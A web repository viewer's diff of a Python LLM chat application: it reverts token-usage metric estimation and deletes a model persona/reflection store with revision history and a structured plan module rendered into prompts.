db.scalar(
|
||||
select(func.count())
|
||||
.select_from(Message)
|
||||
.where(
|
||||
Message.chat_id == chat.id,
|
||||
(Message.created_at < cursor.created_at)
|
||||
| ((Message.created_at == cursor.created_at) & (Message.id < cursor.id)),
|
||||
)
|
||||
)
|
||||
or 0
|
||||
) > 0
|
||||
@@ -75,39 +75,17 @@ class Metrics:
|
||||
def from_generation(generation: Any) -> Metrics:
|
||||
"""Metrics for a reply still being written.
|
||||
|
||||
A reported count is never second-guessed. Where the endpoint has said a
|
||||
number, that number is what is shown; our own estimate is four characters to
|
||||
a token and is wrong enough on code and CJK that overriding an exact figure
|
||||
with it would be a downgrade dressed as a fix.
|
||||
|
||||
What the estimate is for is the gap *between* reported counts. Usage arrives
|
||||
once per round, so on a forty-round agent reply the counts used to stand
|
||||
still for minutes at a time while text streamed underneath them -- reported
|
||||
was non-zero from round one onwards, so the `or` below never reached its
|
||||
fallback again. `_since_counted` closes that gap: it is what has been written
|
||||
since the last usage chunk, and it is zero at the moment one lands. So the
|
||||
figures climb while a round runs and land exactly on the reported total when
|
||||
it ends, which is the same property in both directions.
|
||||
|
||||
The prompt is deliberately not treated that way. It does not grow within a
|
||||
round -- it is the request that was sent -- so there is nothing to interpolate
|
||||
and nothing that would freeze.
|
||||
Usage arrives in a single chunk at the very end, so mid-stream there is
|
||||
nothing to report and everything is estimated. The counts stop being
|
||||
estimates the moment that chunk lands, which is usually a beat before the
|
||||
bubble is replaced.
|
||||
"""
|
||||
import time
|
||||
|
||||
# Zero the instant a usage chunk lands, so a reported figure is passed
|
||||
# through untouched and only the interval between them is filled in.
|
||||
extra = _since_counted(generation)
|
||||
|
||||
completion = (generation.completion_tokens + extra) or tokens.estimate(
|
||||
completion = generation.completion_tokens or tokens.estimate(
|
||||
generation.text + generation.thinking
|
||||
)
|
||||
# `prompt_estimate_total`, not `prompt_estimate`. The two answer different
|
||||
# questions -- every round's prompt against the latest round's -- and this
|
||||
# chip is what the reply cost, which is the sum. Reading the latest one here
|
||||
# while the end-of-reply path stored the total made the number visibly jump
|
||||
# at the `done` frame on any reply that called a tool.
|
||||
prompt = generation.prompt_tokens or generation.prompt_estimate_total
|
||||
prompt = generation.prompt_tokens or generation.prompt_estimate
|
||||
elapsed = generation.elapsed_ms or (
|
||||
int((time.monotonic() - generation.started_at) * 1000) if generation.started_at else 0
|
||||
)
|
||||
@@ -116,34 +94,14 @@ def from_generation(generation: Any) -> Metrics:
|
||||
prompt_tokens=prompt,
|
||||
completion_tokens=completion,
|
||||
total_tokens=prompt + completion,
|
||||
context_tokens=(generation.context_tokens + extra)
|
||||
or (generation.prompt_estimate + completion),
|
||||
context_tokens=generation.context_tokens or (prompt + completion),
|
||||
context_limit=generation.context_limit,
|
||||
# One recorded fact rather than an inference from two counts. Inferring
|
||||
# it read `False` once the end-of-reply fallback had filled both fields
|
||||
# in, so a reply estimated from beginning to end showed `~` throughout
|
||||
# and then dropped it at the moment it was stored -- the tilde vanishing
|
||||
# exactly where it was most needed.
|
||||
estimated=not generation.reported_usage,
|
||||
estimated=not (generation.prompt_tokens and generation.completion_tokens),
|
||||
elapsed_ms=elapsed,
|
||||
rounds=max(1, generation.rounds),
|
||||
)
|
||||
|
||||
|
||||
def _since_counted(generation: Any) -> int:
|
||||
"""Tokens written since the last usage chunk, estimated.
|
||||
|
||||
Zero before any usage has been reported -- the `or` fallbacks in
|
||||
`from_generation` cover that case whole -- and zero again the moment each
|
||||
chunk lands, because `counted_chars` is stamped there. In between it is the
|
||||
only thing that moves.
|
||||
"""
|
||||
if not generation.reported_usage:
|
||||
return 0
|
||||
written = len(generation.text) + len(generation.thinking)
|
||||
return tokens.estimate_chars(max(0, written - generation.counted_chars))
|
||||
|
||||
|
||||
def from_message(usage_json: dict[str, Any] | None) -> Metrics:
|
||||
"""Metrics for a finished reply, read back off the row."""
|
||||
stored = usage_json or {}
|
||||
|
||||
@@ -1,225 +0,0 @@
|
||||
"""A model's personality, and its read of the person it is talking to.
|
||||
|
||||
Both live in one table (`db/models/persona.py` says why) and both reach the
|
||||
model the way the memories block does: a `{{variable}}` and a fragment, never a
|
||||
second system-prompt layer.
|
||||
|
||||
Three rules, and each is here rather than in the column so a write that breaks
|
||||
one can be trimmed with an explanation instead of failing somebody's turn -- the
|
||||
rule `memories.py` already follows:
|
||||
|
||||
* **Capped.** Both texts are in front of the model on every single request, so
|
||||
a personality that grows without limit is a context window that shrinks
|
||||
without anybody noticing.
|
||||
* **Snapshotted before every change.** A model may rewrite its own persona, so
|
||||
what stops a bad rewrite being permanent is a record and a way back. Not a
|
||||
gate: the roadmap already states the same limit for model-written skills.
|
||||
* **A reflection belongs to the person it is about.** It is keyed on their id,
|
||||
read only for them, and shown to them in their own settings. A model-written
|
||||
note about somebody that they cannot see is not something this application
|
||||
should hold.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import AUTHOR_MODEL, AUTHOR_USER, Persona, PersonaRevision, User
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# Who a model is. Room for a real character -- a voice, what it cares about, how
|
||||
# it argues -- and not room for a second system prompt. An administrator who
|
||||
# wants more than this wants `Model.system_prompt`, which is the layer meant for
|
||||
# instructions and is not rewritten by the model.
|
||||
MAX_PERSONA_CHARS = 1200
|
||||
|
||||
# What one model has made of one person. Shorter on purpose: it is a standing
|
||||
# impression, not a file. Anything that needs more than this is either a memory
|
||||
# (a fact) or a note (a document).
|
||||
MAX_VIEW_CHARS = 800
|
||||
|
||||
# How many "before" states are kept. Enough to undo a bad afternoon, bounded so
|
||||
# a model editing itself every turn cannot grow the table without limit.
|
||||
MAX_REVISIONS = 20
|
||||
|
||||
|
||||
def _limit(reflection: bool) -> int:
|
||||
return MAX_VIEW_CHARS if reflection else MAX_PERSONA_CHARS
|
||||
|
||||
|
||||
def get(db: DBSession, model_key: str, owner: User | None) -> Persona | None:
|
||||
"""The persona for a model, or that model's read of one person.
|
||||
|
||||
`owner=None` asks for the model's own persona. There is no fallback between
|
||||
the two: a reflection is not a kind of persona and must not stand in for a
|
||||
missing one.
|
||||
"""
|
||||
if not model_key:
|
||||
return None
|
||||
return db.scalars(
|
||||
select(Persona).where(
|
||||
Persona.model_key == model_key,
|
||||
Persona.owner_id == (owner.id if owner is not None else None),
|
||||
)
|
||||
).first()
|
||||
|
||||
|
||||
def reflections_for(db: DBSession, owner: User | None) -> list[Persona]:
|
||||
"""Every model's read of one person, for that person's own settings page."""
|
||||
if owner is None:
|
||||
return []
|
||||
return list(
|
||||
db.scalars(
|
||||
select(Persona)
|
||||
.where(Persona.owner_id == owner.id)
|
||||
.order_by(Persona.model_key)
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
def personas_for(db: DBSession, model_keys: list[str]) -> dict[str, Persona]:
|
||||
"""Every model's own persona, keyed by model id. For the admin screens."""
|
||||
if not model_keys:
|
||||
return {}
|
||||
rows = db.scalars(
|
||||
select(Persona).where(
|
||||
Persona.model_key.in_(model_keys), Persona.owner_id.is_(None)
|
||||
)
|
||||
)
|
||||
return {row.model_key: row for row in rows}
|
||||
|
||||
|
||||
def write(
|
||||
db: DBSession,
|
||||
*,
|
||||
model_key: str,
|
||||
owner: User | None,
|
||||
content: str,
|
||||
author: str = AUTHOR_MODEL,
|
||||
note: str = "",
|
||||
) -> Persona:
|
||||
"""Set a persona or a reflection, keeping what was there.
|
||||
|
||||
Returns the row. Raises `ValueError` only for a write with no model to
|
||||
attach to -- an over-long text is trimmed rather than refused, because the
|
||||
alternative is a model losing a turn to a length it could not have known.
|
||||
"""
|
||||
if not model_key:
|
||||
raise ValueError("There is no model to write a personality for.")
|
||||
|
||||
reflection = owner is not None
|
||||
text = (content or "").strip()[: _limit(reflection)]
|
||||
row = get(db, model_key, owner)
|
||||
|
||||
if row is None:
|
||||
row = Persona(
|
||||
model_key=model_key,
|
||||
owner_id=owner.id if reflection else None,
|
||||
content=text,
|
||||
author=author if author in (AUTHOR_USER, AUTHOR_MODEL) else AUTHOR_MODEL,
|
||||
)
|
||||
db.add(row)
|
||||
db.commit()
|
||||
return row
|
||||
|
||||
if row.content == text:
|
||||
# Nothing changed, so nothing is snapshotted. Otherwise a model that
|
||||
# rewrites itself with the same words every turn fills the history with
|
||||
# identical revisions and pushes the real "before" out of it.
|
||||
return row
|
||||
|
||||
db.add(
|
||||
PersonaRevision(
|
||||
persona_id=row.id,
|
||||
content=row.content,
|
||||
author=row.author,
|
||||
note=(note or "").strip()[:200],
|
||||
)
|
||||
)
|
||||
row.content = text
|
||||
row.author = author if author in (AUTHOR_USER, AUTHOR_MODEL) else AUTHOR_MODEL
|
||||
db.commit()
|
||||
_prune(db, row)
|
||||
return row
|
||||
|
||||
|
||||
def _prune(db: DBSession, row: Persona) -> None:
|
||||
"""Drop the oldest revisions past the ceiling.
|
||||
|
||||
Queried rather than read off `row.revisions`, and ordered with the id as a
|
||||
tiebreak. Both matter. The session is built with `expire_on_commit=False`, so
|
||||
the loaded collection can be a version of the list from before the write that
|
||||
prompted this -- which is how the first draft of this deleted a row that was
|
||||
already gone and left one that should have been. And revisions written in the
|
||||
same microsecond order arbitrarily under `created_at` alone, so which ones
|
||||
"the oldest" names would not be stable.
|
||||
"""
|
||||
extra = list(
|
||||
db.scalars(
|
||||
select(PersonaRevision)
|
||||
.where(PersonaRevision.persona_id == row.id)
|
||||
.order_by(PersonaRevision.created_at.desc(), PersonaRevision.id.desc())
|
||||
.offset(MAX_REVISIONS)
|
||||
)
|
||||
)
|
||||
if not extra:
|
||||
return
|
||||
for revision in extra:
|
||||
db.delete(revision)
|
||||
db.commit()
|
||||
# Or the caller's next read of `row.revisions` is the list that still has
|
||||
# them in it.
|
||||
db.expire(row, ["revisions"])
|
||||
|
||||
|
||||
def revert(db: DBSession, row: Persona, revision: PersonaRevision) -> Persona:
|
||||
"""Put a previous text back, as the person doing the reverting.
|
||||
|
||||
Goes through `write`, so the text being replaced is itself snapshotted: an
|
||||
undo that cannot be undone is a second way to lose the same work.
|
||||
"""
|
||||
owner = db.get(User, row.owner_id) if row.owner_id else None
|
||||
return write(
|
||||
db,
|
||||
model_key=row.model_key,
|
||||
owner=owner,
|
||||
content=revision.content,
|
||||
author=AUTHOR_USER,
|
||||
note="reverted",
|
||||
)
|
||||
|
||||
|
||||
def clear(db: DBSession, row: Persona) -> None:
|
||||
db.delete(row)
|
||||
db.commit()
|
||||
|
||||
|
||||
def block(db: DBSession, model_key: str, owner: User | None) -> str:
|
||||
"""The text as the prompt carries it, or "" when there is nothing to say.
|
||||
|
||||
Empty and disabled are the same answer on purpose: the fragments that read
|
||||
this are gated on it with `requires`, so both make the whole section vanish
|
||||
rather than leaving a heading above nothing.
|
||||
"""
|
||||
row = get(db, model_key, owner)
|
||||
if row is None or not row.enabled:
|
||||
return ""
|
||||
return (row.content or "").strip()
|
||||
|
||||
|
||||
__all__ = [
|
||||
"MAX_PERSONA_CHARS",
|
||||
"MAX_REVISIONS",
|
||||
"MAX_VIEW_CHARS",
|
||||
"block",
|
||||
"clear",
|
||||
"get",
|
||||
"personas_for",
|
||||
"reflections_for",
|
||||
"revert",
|
||||
"write",
|
||||
]
|
||||
@@ -1,342 +0,0 @@
|
||||
"""A plan, as a structure rather than a list of sentences.
|
||||
|
||||
Plan mode used to produce `{title, steps}` and then forget it. That is enough to
|
||||
propose something and useless for carrying it out: there is nowhere to record
|
||||
what was found, nothing to tick off, and — worst — the plan was not in the
|
||||
prompt at all once execution started, so a model could not have kept it current
|
||||
if it had wanted to.
|
||||
|
||||
Version 2 is findings, objectives and phases of tasks. Three rules hold it up.
|
||||
|
||||
**`steps` is always written.** Flattened from every phase's tasks, in order. It
|
||||
is what `execute_plan` reads, so nothing downstream had to learn version 2 and
|
||||
every row already on disk keeps working.
|
||||
|
||||
**`normalise` is the only reader.** A `{title, steps}` row becomes one phase
|
||||
called "Plan" whose tasks are those steps, so the card, the harness and the
|
||||
Execute button have exactly one shape to deal with rather than two.
|
||||
|
||||
**Ids are generated here and never chosen by the model.** They appear in
|
||||
`render_block` so the model can quote one back to `plan_update`; letting it name
|
||||
them would mean validating names it made up, and a collision would silently
|
||||
re-tick a different task.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Any
|
||||
|
||||
VERSION = 2
|
||||
|
||||
# Bounds. A plan is read by a person and injected into every request while the
|
||||
# work is going on, so "as many as you like" costs the window forever and buries
|
||||
# the four items that mattered.
|
||||
MAX_PHASES = 8
|
||||
MAX_TASKS = 12
|
||||
MAX_OBJECTIVES = 8
|
||||
MAX_FINDINGS = 20
|
||||
MAX_TEXT = 300
|
||||
MAX_TITLE = 120
|
||||
|
||||
# The ceiling on the block put in front of the model each turn.
|
||||
MAX_PLAN_CHARS = 2000
|
||||
|
||||
TASK_STATUSES = ("todo", "doing", "done", "dropped")
|
||||
OBJECTIVE_STATUSES = ("open", "done", "dropped")
|
||||
PHASE_STATUSES = ("pending", "active", "done")
|
||||
|
||||
_DONE = {"done", "dropped"}
|
||||
|
||||
|
||||
def _text(value: Any, limit: int = MAX_TEXT) -> str:
|
||||
return " ".join(str(value or "").split())[:limit]
|
||||
|
||||
|
||||
def _status(value: Any, allowed: tuple[str, ...], fallback: str) -> str:
|
||||
wanted = str(value or "").strip().lower()
|
||||
return wanted if wanted in allowed else fallback
|
||||
|
||||
|
||||
def _listed(value: Any) -> list[Any]:
|
||||
"""A list, from a list or from the one thing a model sent instead.
|
||||
|
||||
The same tolerance `generation._questions_in` shows, for the same reason: a
|
||||
small model sends something close to the schema rather than the schema, and
|
||||
refusing costs a whole round trip to say so.
|
||||
"""
|
||||
if value is None:
|
||||
return []
|
||||
if isinstance(value, list):
|
||||
return value
|
||||
return [value]
|
||||
|
||||
|
||||
# --- Reading -------------------------------------------------------------------
|
||||
def normalise(raw: dict[str, Any] | None) -> dict[str, Any]:
|
||||
"""Any stored plan, as version 2.
|
||||
|
||||
A `{title, steps}` row -- which is every row that exists today -- becomes one
|
||||
phase called "Plan" whose tasks are the steps. Everything downstream then has
|
||||
one shape, and the version-1 branch lives here and nowhere else.
|
||||
"""
|
||||
raw = raw or {}
|
||||
if not raw:
|
||||
return {}
|
||||
|
||||
title = _text(raw.get("title"), MAX_TITLE) or "A plan"
|
||||
findings = [
|
||||
{"id": f"f{n}", "text": _text(item.get("text") if isinstance(item, dict) else item)}
|
||||
for n, item in enumerate(_listed(raw.get("findings"))[:MAX_FINDINGS], start=1)
|
||||
]
|
||||
findings = [f for f in findings if f["text"]]
|
||||
|
||||
objectives = []
|
||||
for n, item in enumerate(_listed(raw.get("objectives"))[:MAX_OBJECTIVES], start=1):
|
||||
source = item if isinstance(item, dict) else {"text": item}
|
||||
text = _text(source.get("text"))
|
||||
if text:
|
||||
objectives.append(
|
||||
{
|
||||
"id": f"o{n}",
|
||||
"text": text,
|
||||
"status": _status(source.get("status"), OBJECTIVE_STATUSES, "open"),
|
||||
}
|
||||
)
|
||||
|
||||
phases = _phases(raw)
|
||||
if not phases:
|
||||
# Version 1, or a model that sent only steps. One phase, so the rest of
|
||||
# the codebase never sees the older shape.
|
||||
tasks = [_text(step) for step in _listed(raw.get("steps"))]
|
||||
phases = [
|
||||
{
|
||||
"id": "p1",
|
||||
"title": "Plan",
|
||||
"status": "pending",
|
||||
"tasks": [
|
||||
{"id": f"t{n}", "text": text, "status": "todo", "note": ""}
|
||||
for n, text in enumerate([t for t in tasks if t][:MAX_TASKS], start=1)
|
||||
],
|
||||
}
|
||||
]
|
||||
|
||||
plan = {
|
||||
"version": VERSION,
|
||||
"title": title,
|
||||
"summary": _text(raw.get("summary")),
|
||||
"findings": findings,
|
||||
"objectives": objectives,
|
||||
"phases": phases,
|
||||
}
|
||||
plan["steps"] = flatten(plan)
|
||||
return plan
|
||||
|
||||
|
||||
def _phases(raw: dict[str, Any]) -> list[dict[str, Any]]:
|
||||
out: list[dict[str, Any]] = []
|
||||
counter = 0
|
||||
for n, item in enumerate(_listed(raw.get("phases"))[:MAX_PHASES], start=1):
|
||||
source = item if isinstance(item, dict) else {"title": item}
|
||||
tasks = []
|
||||
for entry in _listed(source.get("tasks"))[:MAX_TASKS]:
|
||||
got = entry if isinstance(entry, dict) else {"text": entry}
|
||||
text = _text(got.get("text"))
|
||||
if not text:
|
||||
continue
|
||||
counter += 1
|
||||
tasks.append(
|
||||
{
|
||||
"id": f"t{counter}",
|
||||
"text": text,
|
||||
"status": _status(got.get("status"), TASK_STATUSES, "todo"),
|
||||
"note": _text(got.get("note")),
|
||||
}
|
||||
)
|
||||
title = _text(source.get("title"), MAX_TITLE)
|
||||
if not title and not tasks:
|
||||
continue
|
||||
out.append(
|
||||
{
|
||||
"id": f"p{n}",
|
||||
"title": title or f"Phase {n}",
|
||||
"status": _status(source.get("status"), PHASE_STATUSES, "pending"),
|
||||
"tasks": tasks,
|
||||
}
|
||||
)
|
||||
return out
|
||||
|
||||
|
||||
def flatten(plan: dict[str, Any]) -> list[str]:
|
||||
"""Every task, in order, as plain sentences.
|
||||
|
||||
This is `steps`, and it is why version 2 needed no migration: `execute_plan`
|
||||
reads it and does not know the rest exists.
|
||||
"""
|
||||
return [task["text"] for phase in plan.get("phases", []) for task in phase.get("tasks", [])]
|
||||
|
||||
|
||||
# --- Writing --------------------------------------------------------------------
|
||||
def build(**raw: Any) -> dict[str, Any]:
|
||||
"""A plan from what `plan_submit` was given."""
|
||||
return normalise(raw)
|
||||
|
||||
|
||||
def merge(plan: dict[str, Any], patch: dict[str, Any]) -> tuple[dict[str, Any], list[str]]:
|
||||
"""The plan with one update applied, and what changed, in words.
|
||||
|
||||
Returns the words as well as the plan because the model gets them back as
|
||||
the tool's result -- "t3 is done, t4 is now doing" is what tells it the
|
||||
bookkeeping landed, and a silent success reads as a call that did nothing.
|
||||
"""
|
||||
plan = normalise(plan)
|
||||
if not plan:
|
||||
return {}, []
|
||||
|
||||
changed: list[str] = []
|
||||
tasks = {task["id"]: task for phase in plan["phases"] for task in phase["tasks"]}
|
||||
objectives = {item["id"]: item for item in plan["objectives"]}
|
||||
|
||||
for entry in _listed(patch.get("task_status")):
|
||||
got = entry if isinstance(entry, dict) else {"id": entry}
|
||||
task = tasks.get(_text(got.get("id"), 32))
|
||||
if task is None:
|
||||
continue
|
||||
task["status"] = _status(got.get("status"), TASK_STATUSES, task["status"])
|
||||
if got.get("note") is not None:
|
||||
task["note"] = _text(got.get("note"))
|
||||
changed.append(f"{task['id']} is {task['status']}")
|
||||
|
||||
for entry in _listed(patch.get("objective_status")):
|
||||
got = entry if isinstance(entry, dict) else {"id": entry}
|
||||
objective = objectives.get(_text(got.get("id"), 32))
|
||||
if objective is None:
|
||||
continue
|
||||
objective["status"] = _status(
|
||||
got.get("status"), OBJECTIVE_STATUSES, objective["status"]
|
||||
)
|
||||
changed.append(f"{objective['id']} is {objective['status']}")
|
||||
|
||||
for raw in _listed(patch.get("findings")):
|
||||
text = _text(raw.get("text") if isinstance(raw, dict) else raw)
|
||||
if not text or len(plan["findings"]) >= MAX_FINDINGS:
|
||||
continue
|
||||
plan["findings"].append({"id": f"f{len(plan['findings']) + 1}", "text": text})
|
||||
changed.append("a finding was recorded")
|
||||
|
||||
counter = max((int(t["id"][1:]) for t in tasks.values() if t["id"][1:].isdigit()), default=0)
|
||||
for entry in _listed(patch.get("add_tasks")):
|
||||
got = entry if isinstance(entry, dict) else {"text": entry}
|
||||
text = _text(got.get("text"))
|
||||
if not text:
|
||||
continue
|
||||
phase = _phase_for(plan, _text(got.get("phase"), 32))
|
||||
if phase is None or len(phase["tasks"]) >= MAX_TASKS:
|
||||
continue
|
||||
counter += 1
|
||||
phase["tasks"].append(
|
||||
{"id": f"t{counter}", "text": text, "status": "todo", "note": ""}
|
||||
)
|
||||
changed.append(f"t{counter} was added")
|
||||
|
||||
if patch.get("summary") is not None:
|
||||
plan["summary"] = _text(patch.get("summary"))
|
||||
|
||||
_restate_phases(plan)
|
||||
plan["steps"] = flatten(plan)
|
||||
return plan, changed
|
||||
|
||||
|
||||
def _phase_for(plan: dict[str, Any], wanted: str) -> dict[str, Any] | None:
|
||||
"""The named phase, or the one work is currently in."""
|
||||
for phase in plan["phases"]:
|
||||
if phase["id"] == wanted:
|
||||
return phase
|
||||
for phase in plan["phases"]:
|
||||
if phase["status"] == "active":
|
||||
return phase
|
||||
for phase in plan["phases"]:
|
||||
if any(task["status"] not in _DONE for task in phase["tasks"]):
|
||||
return phase
|
||||
return plan["phases"][-1] if plan["phases"] else None
|
||||
|
||||
|
||||
def _restate_phases(plan: dict[str, Any]) -> None:
|
||||
"""A phase's status follows from its tasks, so it cannot disagree with them.
|
||||
|
||||
Asking the model to keep both current would mean a plan that says "phase 1:
|
||||
done" over four tasks marked todo, which is worse than either alone.
|
||||
"""
|
||||
started = False
|
||||
for phase in plan["phases"]:
|
||||
if not phase["tasks"]:
|
||||
continue
|
||||
if all(task["status"] in _DONE for task in phase["tasks"]):
|
||||
phase["status"] = "done"
|
||||
continue
|
||||
# The first phase with anything left in it is the one being worked on;
|
||||
# everything after it is still to come. There is exactly one active
|
||||
# phase by construction, which is what stops the render showing three.
|
||||
phase["status"] = "pending" if started else "active"
|
||||
started = True
|
||||
|
||||
|
||||
# --- For the prompt ---------------------------------------------------------------
|
||||
def render_block(plan: dict[str, Any] | None, budget: int = MAX_PLAN_CHARS) -> str:
|
||||
"""The plan as the model sees it each turn, within a budget.
|
||||
|
||||
Budgeted rather than dumped, exactly like the project listing: a finished
|
||||
phase collapses to one line, the phase being worked on is shown in full, and
|
||||
the ids are visible because they are what `plan_update` takes.
|
||||
"""
|
||||
plan = normalise(plan)
|
||||
if not plan or budget <= 0:
|
||||
return ""
|
||||
|
||||
lines = [f"**{plan['title']}**"]
|
||||
if plan["summary"]:
|
||||
lines.append(plan["summary"])
|
||||
|
||||
if plan["objectives"]:
|
||||
lines.append("")
|
||||
lines.append("What it is for:")
|
||||
for item in plan["objectives"]:
|
||||
mark = "x" if item["status"] == "done" else "-" if item["status"] == "dropped" else " "
|
||||
lines.append(f"- [{mark}] {item['id']} {item['text']}")
|
||||
|
||||
if plan["findings"]:
|
||||
lines.append("")
|
||||
lines.append("What was found:")
|
||||
for item in plan["findings"][-MAX_FINDINGS:]:
|
||||
lines.append(f"- {item['text']}")
|
||||
|
||||
lines.append("")
|
||||
for phase in plan["phases"]:
|
||||
done = sum(1 for task in phase["tasks"] if task["status"] in _DONE)
|
||||
if phase["status"] == "done" and phase["tasks"]:
|
||||
lines.append(f"✓ {phase['title']} ({len(phase['tasks'])} tasks, done)")
|
||||
continue
|
||||
lines.append(f"{phase['title']} ({done}/{len(phase['tasks'])})")
|
||||
for task in phase["tasks"]:
|
||||
mark = {"done": "x", "doing": ">", "dropped": "-"}.get(task["status"], " ")
|
||||
note = f" — {task['note']}" if task["note"] else ""
|
||||
lines.append(f" [{mark}] {task['id']} {task['text']}{note}")
|
||||
|
||||
text = "\n".join(lines).strip()
|
||||
if len(text) <= budget:
|
||||
return text
|
||||
cut = text[:budget]
|
||||
at = cut.rfind("\n")
|
||||
if at > budget // 2:
|
||||
cut = cut[:at]
|
||||
return f"{cut.rstrip()}\n… (the rest is in the plan card above)"
|
||||
|
||||
|
||||
__all__ = [
|
||||
"MAX_PLAN_CHARS",
|
||||
"VERSION",
|
||||
"build",
|
||||
"flatten",
|
||||
"merge",
|
||||
"normalise",
|
||||
"render_block",
|
||||
]
|
||||
+25
-1134
File diff suppressed because it is too large
Load Diff
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user